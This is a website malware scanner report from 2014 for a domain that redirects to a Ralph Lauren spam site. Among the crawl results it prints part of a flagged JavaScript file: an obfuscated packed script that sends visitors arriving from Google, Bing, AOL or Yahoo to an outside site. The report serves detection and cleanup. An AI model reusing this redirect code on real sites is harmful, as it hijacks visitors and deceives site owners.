New scan:

Malware Scanner report for creditupgrades.co.uk

Malicious/Suspicious/Total urls checked
1/0/18
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://creditupgrades.co.uk/
HTTP/1.1 301 Moved Permanently
Date: Sat, 16 Aug 2014 04:44:22 GMT
Location: http://www.ladycavaliers.com/
Server: Microsoft-IIS/6.0
Content-Length: 152
Content-Type: text/html
X-Powered-By: ASP.NET
clean
http://www.ladycavaliers.com/
200 OK
Content-Length: 14802
Content-Type: text/html
clean
http://www.ladycavaliers.com/wp-includes/js/jquery/jquery.js?ver=1.10.2
200 OK
Content-Length: 93085
Content-Type: application/x-javascript
clean
http://www.ladycavaliers.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
200 OK
Content-Length: 7200
Content-Type: application/x-javascript
clean
http://www.ladycavaliers.com/wp-content/themes/icy/assets/js/superfish.js?ver=3.8.1
200 OK
Content-Length: 3714
Content-Type: application/x-javascript
clean
http://www.ladycavaliers.com/wp-content/themes/icy/assets/js/main.js?ver=3.8.1
200 OK
Content-Length: 1485
Content-Type: application/x-javascript
clean
http://creditupgrades.co.uk/wp-includes/js/ralphlaurenuk.js
HTTP/1.1 301 Moved Permanently
Date: Sat, 16 Aug 2014 04:44:26 GMT
Location: http://www.ladycavaliers.com/wp-includes/js/ralphlaurenuk.js
Server: Microsoft-IIS/6.0
Content-Length: 183
Content-Type: text/html
X-Powered-By: ASP.NET
clean
http://www.ladycavaliers.com/wp-includes/js/ralphlaurenuk.js
200 OK
Content-Length: 2482
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write ('<a href="http://www.51.la/?16849890" target="_blank" title="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;">&#x7F51;&#x7AD9;&#x7EDF;&#x8BA1;</a>\n');
var a9890tf="51la";var a9890pu="";var a9890pf="51la";var a9890su=window.location;var a9890sf=document.referrer;var a9890of="";var
... 1684 bytes are skipped ...
lt;a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e c=5.b;8(c.9("6")>0 || c.9("2")>0 || c.9("1")>0 || c.9("g")>0){d.a=\'7://f.3.4/\';}',62,17,'|aol|bing|fiorini|co.uk|document|google|http|if|indexOf|location|referrer|s|self|var|www|yahoo'.split('|'),0,{}))

Antivirus reports:

Avast
JS:Redirector-BFT [Trj]
Sophos
JS/RefC-Gen

http://creditupgrades.co.uk/test404page.js
HTTP/1.1 301 Moved Permanently
Date: Sat, 16 Aug 2014 04:44:27 GMT
Location: http://www.ladycavaliers.com/test404page.js
Server: Microsoft-IIS/6.0
Content-Length: 166
Content-Type: text/html
X-Powered-By: ASP.NET
clean
http://www.ladycavaliers.com/test404page.js
404 Not Found
Content-Length: 8690
Content-Type: text/html
clean
http://www.ladycavaliers.com/polo-ralph-lauren-discount-vouchers-uk.html
200 OK
Content-Length: 9163
Content-Type: text/html
clean
http://www.ladycavaliers.com/author/admin
200 OK
Content-Length: 14935
Content-Type: text/html
clean
http://www.ladycavaliers.com/category/uk
200 OK
Content-Length: 12011
Content-Type: text/html
clean
http://www.ladycavaliers.com/ralph-lauren-polos-wholesale-uk.html
200 OK
Content-Length: 9494
Content-Type: text/html
clean
http://www.ladycavaliers.com/ralph-lauren-polo-black-edt-review.html
200 OK
Content-Length: 9407
Content-Type: text/html
clean
http://www.ladycavaliers.com/category/polo
200 OK
Content-Length: 12195
Content-Type: text/html
clean
http://www.ladycavaliers.com/wholesale-ralph-lauren-bulk-buy.html
200 OK
Content-Length: 9430
Content-Type: text/html
clean
http://www.ladycavaliers.com/2014/04
200 OK
Content-Length: 14695
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: creditupgrades.co.uk

Result:
HTTP/1.1 301 Moved Permanently
Date: Sat, 16 Aug 2014 04:44:22 GMT
Location: http://www.ladycavaliers.com/
Server: Microsoft-IIS/6.0
Content-Length: 152
Content-Type: text/html
X-Powered-By: ASP.NET

...152 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: creditupgrades.co.uk
Referer: http://www.google.com/search?q=creditupgrades.co.uk

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=creditupgrades.co.uk

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://creditupgrades.co.uk/

Result: creditupgrades.co.uk is not infected or malware details are not published yet.